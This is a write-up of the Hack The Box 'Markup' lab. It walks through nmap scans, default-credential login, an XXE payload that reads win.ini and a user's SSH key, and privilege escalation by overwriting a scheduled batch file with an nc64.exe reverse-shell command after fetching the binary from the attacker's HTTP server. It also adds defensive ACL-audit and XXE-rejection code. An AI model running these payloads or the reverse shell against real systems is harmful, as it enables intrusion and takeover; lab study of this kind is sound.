#windows #hackthebox #veryeasy

![[Pasted image 20250610231148.png]]

---

# Enumeration - Nmap

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS 10.129.95.192 --min-rate 4000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 21:45 CDT
Nmap scan report for 10.129.95.192
Host is up (0.047s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 33.13 seconds
```

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV 10.129.95.192 -p 22,80,443
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 21:47 CDT
Nmap scan report for 10.129.95.192
Host is up (0.047s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaShopping
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds
```

# What version of Apache is running on the target's port 80?
**Apache 2.4.41**

# What username:password combination logs in successfully?

**admin:password**

![[Pasted image 20250610220325.png]]

# What is the word at the top of the page that accepts user input?

**Order**

![[Pasted image 20250610220437.png]]

# What XML version is used on the target?

**1.0**

![[Pasted image 20250610220710.png]]

# What does the XXE / XEE attack acronym stand for?

**XML External Entity**

# What username can we find on the webpage's HTML code?

**Daniel**

![[Pasted image 20250610220853.png]]

# What is the file located in the Log-Management folder on the target?

The contents of the target's own `win.ini` file are returned in the response message, which proves that the XML External Entity vulnerability is present.

![[Pasted image 20250610223053.png]]

Having confirmed that the target is vulnerable to XXE, we can read the `daniel` user's `.ssh` folder to retrieve their private key.

![[Pasted image 20250610223253.png]]

Now we can log in over SSH using that key.

```bash
vim id_rsa   # paste the key from the response
chmod 400 id_rsa
ssh -i id_rsa daniel@10.129.95.192
```

Successfully logged into SSH:

```bash
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

daniel@MARKUP C:\Users\daniel>whoami
markup\daniel
```

I found `job.bat` in `C:\Log-Management`:

```powershell
daniel@MARKUP C:\Log-Management>dir
 Volume in drive C has no label.
 Volume Serial Number is BA76-B4E3

 Directory of C:\Log-Management

03/12/2020  03:56 AM    <DIR>          .
03/12/2020  03:56 AM    <DIR>          ..
03/06/2020  02:42 AM               346 job.bat
               1 File(s)            346 bytes
               2 Dir(s)   7,349,862,400 bytes free
```

**job.bat**

# What executable is mentioned in the file mentioned before?
**wevtutil.exe**

```powershell
daniel@MARKUP C:\Log-Management>type job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
```

# Submit user flag

Found `user.txt` in `C:\Users\daniel\Desktop`:

```bash
daniel@MARKUP C:\Users\daniel\Desktop>type user.txt
032d...
```

# Submit root flag

The `icacls job.bat` command displays the **Access Control List** for the file `job.bat`.

- `BUILTIN\Users:(F)`
  - The Users group has Full control over the file.
  - This entry is not inherited; it was set directly on this file.
- `NT AUTHORITY\SYSTEM:(I)(F)`
  - The SYSTEM account has Full control.
  - The `(I)` indicates this permission is inherited from the parent folder.
- `BUILTIN\Administrators:(I)(F)`
  - The Administrators group has Full control.
  - This is also an inherited permission.
- `BUILTIN\Users:(I)(RX)`
  - The Users group also has *Read & execute* permissions via inheritance.
  - This means Users have both Full control directly and Read & execute via inheritance.

```powershell
daniel@MARKUP C:\Log-Management>icacls job.bat
job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
```

The `ps` command in PowerShell reveals that the process mentioned in `job.bat`, `wevtutil`, is indeed running, which suggests the script is being executed on a schedule by a privileged account.
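The ACL above is the whole privilege-escalation story: a script run by a privileged account is writable by `BUILTIN\Users`. The following is an added example (not part of the original writeup) of how a defender can audit `icacls` output for exactly that condition. It parses the text `icacls <file>` prints and flags any ACE that gives a group every local user belongs to write-capable rights; the sample input is the writeup's own `icacls job.bat` output, and the single-file, no-spaces-in-path layout is an assumption of the parser.

```python
"""Flag icacls ACEs that let low-privileged principals modify a file.

Added example (not from the original writeup): parses the text printed by
`icacls <file>` and reports entries where a group every local user belongs
to holds write-capable rights, the misconfiguration that made job.bat
overwritable on this box.
"""
import re

# Principals that any interactive user on the host is a member of.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}

# icacls simple rights that permit changing the file's contents or its ACL.
WRITE_RIGHTS = {"F", "M", "W"}
# icacls specific rights with the same effect (write data, append data,
# delete, write DAC, write owner).
WRITE_SPECIFIC = {"WD", "AD", "D", "WDAC", "WO"}

# Inheritance / propagation flags, which are not rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)$")

# Output of `icacls job.bat` as shown in the writeup, used here as sample input.
SAMPLE_ICACLS = r"""job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(output):
    """Return (path, aces); each ace is {principal, rights, inherited}.

    Assumes a single file whose path contains no spaces, which is how icacls
    prints it: the path prefixes the first ACE line only.
    """
    path = None
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if path is None:
            path, _, line = line.partition(" ")
        m = ACE_RE.match(line)
        if not m:
            continue
        flags = re.findall(r"\(([^)]*)\)", m.group("flags"))
        rights = set()
        for flag in flags:
            if flag in INHERIT_FLAGS:
                continue
            # Specific rights are comma-separated inside one pair of parens.
            rights.update(r.strip() for r in flag.split(","))
        aces.append({
            "principal": m.group("principal"),
            "rights": rights,
            "inherited": "I" in flags,
        })
    return path, aces


def risky_aces(output):
    """ACEs that grant a low-privileged principal write-capable rights."""
    _, aces = parse_icacls(output)
    return [
        ace for ace in aces
        if ace["principal"] in LOW_PRIV_PRINCIPALS
        and (ace["rights"] & WRITE_RIGHTS or ace["rights"] & WRITE_SPECIFIC)
    ]


if __name__ == "__main__":
    path, _ = parse_icacls(SAMPLE_ICACLS)
    for ace in risky_aces(SAMPLE_ICACLS):
        origin = "inherited" if ace["inherited"] else "explicit"
        print(f"{path}: {ace['principal']} has {sorted(ace['rights'])} ({origin})")
```

Run against the sample, it reports only the explicit `BUILTIN\Users:(F)` entry; the inherited `(RX)` entry is read-only and is left alone. The fix on the host side is to remove that explicit grant so the script is writable only by Administrators and SYSTEM, and to treat any scheduled script under a user-writable directory as a finding in its own right.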
![[Pasted image 20250610225757.png]]

In my local environment:

```bash
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe
python3 -m http.server 8888
```

On the host:

```powershell
PS C:\Log-Management> wget http://10.10.14.39:8888/nc64.exe -outfile nc64.exe
PS C:\Log-Management> dir

    Directory: C:\Log-Management

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/6/2020   1:42 AM            346 job.bat
-a----        6/10/2025   9:02 PM          45272 nc64.exe
```

Since we have full control over the `job.bat` script, we overwrite its contents by running the following command in cmd, not PowerShell:

```powershell
daniel@MARKUP C:\Log-Management>echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.39 1234 > C:\Log-Management\job.bat
```

Set up a listener:

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nc -lvnp 1234
[sudo] password for parallels:
listening on [any] 1234 ...
connect to [10.10.14.39] from (UNKNOWN) [10.129.95.192] 49790
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
markup\administrator
```

In `C:\Users\Administrator\Desktop`, I found `root.txt`:

```powershell
f574...
```
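Looking back at the foothold, the Order page's XXE (the `win.ini` read and the SSH key retrieval) exists only because the server-side parser honoured a DTD in user-supplied XML. The following is an added example, not the MegaShopping application's code: a Python stand-in for the Order endpoint's server-side handling that refuses any document carrying a `DOCTYPE` or `ENTITY` declaration before the parser ever sees it. The order fields (`quantity`, `item`, `address`) are an assumed schema, and both sample requests are constructed here.

```python
"""Reject XML that carries a DTD before it reaches the parser.

Added example (not from the original writeup or the MegaShopping app): a
Python stand-in for the Order endpoint's server-side handling. The order
fields are an assumed schema, not taken from the page.
"""
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when a document declares a DTD or entities, or breaks the schema."""


# Any DOCTYPE or ENTITY declaration is refused outright: an endpoint that only
# needs plain elements has no reason to accept either, and XXE depends on them.
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")

# Element names the endpoint is allowed to read (assumed schema).
ALLOWED_FIELDS = {"quantity", "item", "address"}

# Constructed benign request.
BENIGN_ORDER = b"""<?xml version="1.0" encoding="UTF-8"?>
<order>
  <quantity>1</quantity>
  <item>Home Appliances</item>
  <address>1 Main St</address>
</order>"""

# Constructed request of the kind the writeup used to read win.ini.
XXE_ORDER = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<order>
  <quantity>1</quantity>
  <item>&xxe;</item>
  <address>1 Main St</address>
</order>"""


def is_safe_xml(data: bytes) -> bool:
    """True if the document contains no DTD or entity declaration.

    The check is case-insensitive and deliberately crude: a marker inside a
    comment or CDATA section also fails, which is the safe direction.
    """
    upper = data.upper()
    return not any(marker in upper for marker in DTD_MARKERS)


def parse_order(data: bytes) -> dict:
    """Parse an order document into a dict of allowed fields, or raise UnsafeXML."""
    if not is_safe_xml(data):
        raise UnsafeXML("DTD or entity declarations are not accepted")
    root = ET.fromstring(data)
    if root.tag != "order":
        raise UnsafeXML(f"unexpected root element {root.tag!r}")
    fields = {}
    for child in root:
        if child.tag not in ALLOWED_FIELDS:
            raise UnsafeXML(f"unexpected element {child.tag!r}")
        fields[child.tag] = (child.text or "").strip()
    return fields


if __name__ == "__main__":
    print(parse_order(BENIGN_ORDER))
    try:
        parse_order(XXE_ORDER)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

The pre-parse check is the layer that matters: once a parser is allowed to resolve external entities, every other control is downstream of the file read. In the PHP 7.2 stack this box runs, the equivalent is to never pass `LIBXML_NOENT` to `simplexml_load_string` or `DOMDocument::loadXML` and to call `libxml_disable_entity_loader(true)` before parsing untrusted input.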